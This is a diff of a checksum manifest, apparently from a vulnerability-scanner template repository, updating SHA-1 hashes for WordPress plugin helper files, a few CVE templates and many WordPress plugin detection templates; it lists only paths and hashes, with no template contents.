helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 -helpers/wordpress/plugins/pixelyoursite.txt:7484f12819849725f45fc1539fd2128bde3834ee +helpers/wordpress/plugins/pixelyoursite.txt:0b613b1113c478fd8e9cb11573a0ce72f209ead3 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -871,9 +871,9 @@ helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad9 helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:a56cd29155af22769bebe0b88ece9fc6cfca3731 +helpers/wordpress/plugins/royal-elementor-addons.txt:6d620af1c20dcb1dfc911c1dded7bf70bbd30c8a helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb -helpers/wordpress/plugins/seo-by-rank-math.txt:c98fdfe8d33e88802886bd84d87d6117bcb8ad03 +helpers/wordpress/plugins/seo-by-rank-math.txt:5bf51483cdbf6af88985eb92aeb46c696e503716 helpers/wordpress/plugins/sg-cachepress.txt:04035664301b06859586cb750fd8f8ad988856ea helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea @@ -897,7 +897,7 @@ helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d helpers/wordpress/plugins/the-events-calendar.txt:efb11eb82b4282760409042dd3fd4bff129bbec9 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 -helpers/wordpress/plugins/translatepress-multilingual.txt:14507aa9246588cbf1725303a1878c660615d91a +helpers/wordpress/plugins/translatepress-multilingual.txt:0aaa3cea7451675ff270540e13308210d8fce9ab helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d @@ -940,7 +940,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:d2c05942fd98efff4c5130f3478ddaad1ed28f27 +helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 helpers/wordpress/plugins/wp-super-cache.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -3443,7 +3443,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34102.yaml:e60a9caeef15ae32d4123681136a3c94b938753c +http/cves/2024/CVE-2024-34102.yaml:c9a3eb48e7147fc3f4c8e78924ec9cbdc47d7cb1 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -7214,227 +7214,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:45bf2a55efe25a99b94abda7f454b8bffe39c6ca -http/technologies/wordpress/plugins/add-to-any.yaml:93e2eb051d4a8f94d659d93bb0087094431705fd -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df0a43836dbbb886f7a24c8e249fefbaeae90a96 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:e49a5940765ec7175a715cc72ff910e52961f559 -http/technologies/wordpress/plugins/akismet.yaml:d8c166ee7f0b19de5c5b7eb2cb33dcab2da03e02 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ff666dc418cae616c44afd49bc604f65c8257df8 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c67e28c0659bf3501b8d20b768609ef926adf947 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3faa3481b7ddf6dba9f391f4a945b5ebd1814fec -http/technologies/wordpress/plugins/amp.yaml:b05ce31ce9fb79bee99957789d8a984ff8c5b43b -http/technologies/wordpress/plugins/antispam-bee.yaml:3722fe75c8d9d1673834540a689cc31c7a65fe90 -http/technologies/wordpress/plugins/astra-sites.yaml:0ab7e95888dff6779d9b4b96683c3518ff2f196a +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:90074a2b70acf7e376872cfe61cc5b1b9ce421a7 -http/technologies/wordpress/plugins/backwpup.yaml:986f5648a90ba8129aff143c783d5f9f2b50fd3b -http/technologies/wordpress/plugins/better-search-replace.yaml:e9907130dfd2b5fd59966f87ff83d41bf5071e4c -http/technologies/wordpress/plugins/better-wp-security.yaml:81fef33a133a80dff37041cb8172b3f09b9d82cb -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:54c72417ba072259dfc5296f59ec39a77dbc95ba -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:71ced6cf68403c01d3b948448596f43396989241 -http/technologies/wordpress/plugins/breeze.yaml:9e98a29a17621615588218fb12e2e2784cc7c832 -http/technologies/wordpress/plugins/broken-link-checker.yaml:63d1e7d319fa3e697f6d6fcb1a6f1024817bdb17 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3faabcdda55bf3d4e5812b4c5ede8e396c2cae6f -http/technologies/wordpress/plugins/classic-editor.yaml:c3b37158f78e69f26667b5d51868a0274b307de5 -http/technologies/wordpress/plugins/classic-widgets.yaml:9eaffdad9d8478b38443b0eb52353cf67cea356c -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:2c44bee53ad8b01ab71c7bce6a1d696a5879db79 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:9e0e3f13cf9b85800f0ccfaf3c12937fb37b7179 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:5c0afd6a292327c030d9d187cc38c476deae12c4 -http/technologies/wordpress/plugins/coblocks.yaml:b320c702ad3bfe8b72e19a6086df8a692a7468e6 -http/technologies/wordpress/plugins/code-snippets.yaml:6ab800193f1c5e60625931874b017c44b5f5facb -http/technologies/wordpress/plugins/coming-soon.yaml:8c16543e8a56a90634e5a4f21362c25f36e353a5 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:bba47afa14136a394d7efe7686dd4f149efecbf3 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:47c5f357735b3a67e147c2f30da45269b33b1cfe -http/technologies/wordpress/plugins/contact-form-7.yaml:2c07fc0377a340d10578abe4dc93d9f692b1957a -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:84cf4c793ddd6ba6e4b1280eb14277803e5c2951 -http/technologies/wordpress/plugins/cookie-law-info.yaml:fea637b9a4a2f423b7f2755d0d4baea606d34315 -http/technologies/wordpress/plugins/cookie-notice.yaml:930b338ef7caeb805fc9cc07bada50ab73c9087b -http/technologies/wordpress/plugins/copy-delete-posts.yaml:92ba52ac674c230d3e613b46a8a7d6eef57743e8 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:e39e1ed0ee99d02b07bb3d542f7dbc2fbd773205 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:51678108308852feaef2a6c02090c25cd2c78039 -http/technologies/wordpress/plugins/custom-css-js.yaml:8e2cf98cee062fc90f24a7c704651bfc0f4dab8c -http/technologies/wordpress/plugins/custom-fonts.yaml:ffe36691d4fa9eba460947c3a101bd9f9d5c5f46 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e7859198588a801e0fb1c382c09348d1b7ffe4ec -http/technologies/wordpress/plugins/disable-comments.yaml:572ad46b6306c85ddcf91659fd4219edc3745d8d -http/technologies/wordpress/plugins/disable-gutenberg.yaml:1ccb9bc08a8dbfb91849f465f7c4ca7601cf7d15 -http/technologies/wordpress/plugins/duplicate-page.yaml:9e846989455fbb9c4f1223ec8d60b037555df26c -http/technologies/wordpress/plugins/duplicate-post.yaml:37c28636194c102a2cdd96c79269dd96230a34b8 -http/technologies/wordpress/plugins/duplicator.yaml:148227339179669966f498ed5b60a57575a370c2 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:50dd36c712fcb755de2c0dc1171786ec0650ab84 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:ff61d3d321e535c2bf7fac36c41b21b7caa731df -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b47c86838cb3d897d08370b7c8c8d415a269b639 -http/technologies/wordpress/plugins/elementor.yaml:9562400da8efa69a15fcae716d8edc9b5933b844 -http/technologies/wordpress/plugins/elementskit-lite.yaml:64288493610d5327877d73a7626a759e10c73eb1 -http/technologies/wordpress/plugins/enable-media-replace.yaml:eaf28ded23762339df9952f98694c4b134c612e9 -http/technologies/wordpress/plugins/envato-elements.yaml:b83b23c8307674fe844ef00b1c6d079d46163e5c -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:4814337ed7ea4f8ff550ca35210dc9d2a8e24b9b -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:39ea82e62e1ee0d404f72ab2e0300e9baef07c66 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:f6c503827cb0f6b63d4038a67905eb91aac43407 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f117f95cdbe84cb2ccdb495b66d20e9a90828496 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:9600ec5eb4cf44d593cc527c923c610c93f4d2f2 -http/technologies/wordpress/plugins/flamingo.yaml:a13b54499ee513fe04ce5691eda0d3ccae930737 -http/technologies/wordpress/plugins/fluentform.yaml:85080f460dc02ed36bcb169a4e542103152294e4 -http/technologies/wordpress/plugins/font-awesome.yaml:4f280cc303b4fcbb1fe9286d033a7369297cb12a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:762dc3132e191d2ed51381545e705d21602a3e9a -http/technologies/wordpress/plugins/formidable.yaml:ccd1e01b1768f3ed7416b55e79ba7cd934725358 -http/technologies/wordpress/plugins/forminator.yaml:97667c349733a3031206e8af2468b88440751a3b -http/technologies/wordpress/plugins/ga-google-analytics.yaml:6082595204793d3eb36085cf062e750df94da7e3 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:88e20df6b586ac45e5f925868a2171c1c32b7976 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:d9fe97450dacb4f09624f51fd30f943b7a2a098a -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:cf423ba2dd21741b0f0ea3a7b9ed1442fe61d5bb -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:c8ca658d2b5fb70fbc66ec945ca56d9b3856f398 -http/technologies/wordpress/plugins/google-site-kit.yaml:3933c83f0166c65e2e5b45ba41c518207903b302 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b17abfbce5fc2386b6a46ead4b74b2f88ebc4e2c -http/technologies/wordpress/plugins/gtranslate.yaml:3fd59896cc9c9c038943b2b1457fcdb8fc3f9cc0 -http/technologies/wordpress/plugins/gutenberg.yaml:283a07584be38615142a3dbd8cb6457eb014c4e6 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a218c6920f90abb2f4bb21867e07134e55da03ce +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:987444d304f602e3335f875e935a45b7f39b51dd -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0b59aab3737023ec3238152e5edfbc5a733aa5cb -http/technologies/wordpress/plugins/header-footer.yaml:dcb6409c3c30f7f6ed07f6030db6dc7be82f047c -http/technologies/wordpress/plugins/health-check.yaml:b159ba309f177d6366c4006fc8d011a348504c7c -http/technologies/wordpress/plugins/hello-dolly.yaml:d6e8caeb5356791e6cc2a97736eab90d7bf1831c -http/technologies/wordpress/plugins/host-webfonts-local.yaml:fbe448d69ddfdb642807a22373a597019da263a5 -http/technologies/wordpress/plugins/hostinger.yaml:3d4342e0ffb76d8f5df1a263e394a7999d8f9a14 -http/technologies/wordpress/plugins/image-optimization.yaml:1c1290e3791285cb3c8ec4e41beeac28127530bf -http/technologies/wordpress/plugins/imagify.yaml:1a23166372a242ea7175d10cd9a1eec2c187aa8b -http/technologies/wordpress/plugins/imsanity.yaml:8df50b5a588214271f61a6a62b8c0590f819e13d -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:80d90a4a9b5fa36132f5f3f9f408800410785c16 -http/technologies/wordpress/plugins/instagram-feed.yaml:7e316a43bc2797e381d6574102c1e7f90349d757 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d03f3abb1834643869fcf3ab20ee44a2e1a09fe8 -http/technologies/wordpress/plugins/iwp-client.yaml:4869894e09c18f31af90917579070564f7dcbadc -http/technologies/wordpress/plugins/jetpack-boost.yaml:0442f07c5151f0588ebae7e2eb99ebe6e4ef36e3 -http/technologies/wordpress/plugins/jetpack.yaml:b96cd70f47195eeec3bd230e9901f5d36ec736eb -http/technologies/wordpress/plugins/kadence-blocks.yaml:e53e1c6557a84e866f93938bc1c7fa22f66e8837 -http/technologies/wordpress/plugins/kirki.yaml:d2376369265c614aaa1602b726192b2da031e490 -http/technologies/wordpress/plugins/leadin.yaml:221718dbe685bb85e699b7364e42713397bbbef0 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:9dfb5300ac4ae8e35a544bf477ae4a776d1f0f37 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:fb06de739d623f243e4b1db620a3fc556318c00a -http/technologies/wordpress/plugins/litespeed-cache.yaml:27c71e78a01ec5c3bf97953f8b870336be3bcd42 -http/technologies/wordpress/plugins/loco-translate.yaml:8dfe543788e93840646c4324fe3d76bfdb6a7e27 -http/technologies/wordpress/plugins/loginizer.yaml:1dc818f6b1d32e7d84368c8959be0cdc96d5be5d +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/iwp-client.yaml:b435ab5520345df3f78f16697923cb8b5e529692 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d2497f88c6aa3b1db76b913c793c0fb3a59f41c1 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:6002066b6ec3fe6d15879a68528725e4b3f437b8 -http/technologies/wordpress/plugins/mailpoet.yaml:6060643e3061abaf23d58c219c87718d4577d849 -http/technologies/wordpress/plugins/maintenance.yaml:e88593f9d43d8a275aff05a20fd1d74075a54a10 -http/technologies/wordpress/plugins/mainwp-child.yaml:76992bc72e87fcbce880b8cba8b4bf38eef7560d -http/technologies/wordpress/plugins/malcare-security.yaml:95c2fa720348354f890f844e40083bedbf8faf0a -http/technologies/wordpress/plugins/megamenu.yaml:6a7f4e808410e1d23d6cde24ae7fbca334906bea -http/technologies/wordpress/plugins/members.yaml:78e36a8376d1a3798982cbc1d63a9f4535f4d989 -http/technologies/wordpress/plugins/meta-box.yaml:8e071f4a45853761d66aacf538b3c2095be48bc0 -http/technologies/wordpress/plugins/metform.yaml:9c010b6e7bb7d881606d375f569326f134c9f3c7 -http/technologies/wordpress/plugins/ml-slider.yaml:cb59c3679f72a8fbf9bd09f3dd710d1fb0d23a40 -http/technologies/wordpress/plugins/newsletter.yaml:09f60003da8968150b875802e9087aeffe2e98d3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:3067cbc71c6bf71b3dd0e9b330b632dac7dab2a8 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:f06ed8f18b2cb11599b9b006f48d430708ae0d6e -http/technologies/wordpress/plugins/ninja-forms.yaml:af686e5e538697563567bce5b7c6f1afc9eaecc7 -http/technologies/wordpress/plugins/ocean-extra.yaml:bdddbd6ce1c7989a180124f476e2cb7a8fd145b4 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:38024e72cbc6e0ec84aa3adcf1745a194db7e7d4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:afac6f194b3f9288f57d47b1910ec7912d80928e -http/technologies/wordpress/plugins/optinmonster.yaml:dd15ce5f8c2310ecef5e373b5809601a3c7b2f07 -http/technologies/wordpress/plugins/otter-blocks.yaml:3937bdeb4385434b7329e874e7350705638969c0 -http/technologies/wordpress/plugins/password-protected.yaml:d1876a87dcca1927d45c017800ddfcf888bd1ebc -http/technologies/wordpress/plugins/pdf-embedder.yaml:0ec37498750d8754f0d626a13ab22fdd165f2cad +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec 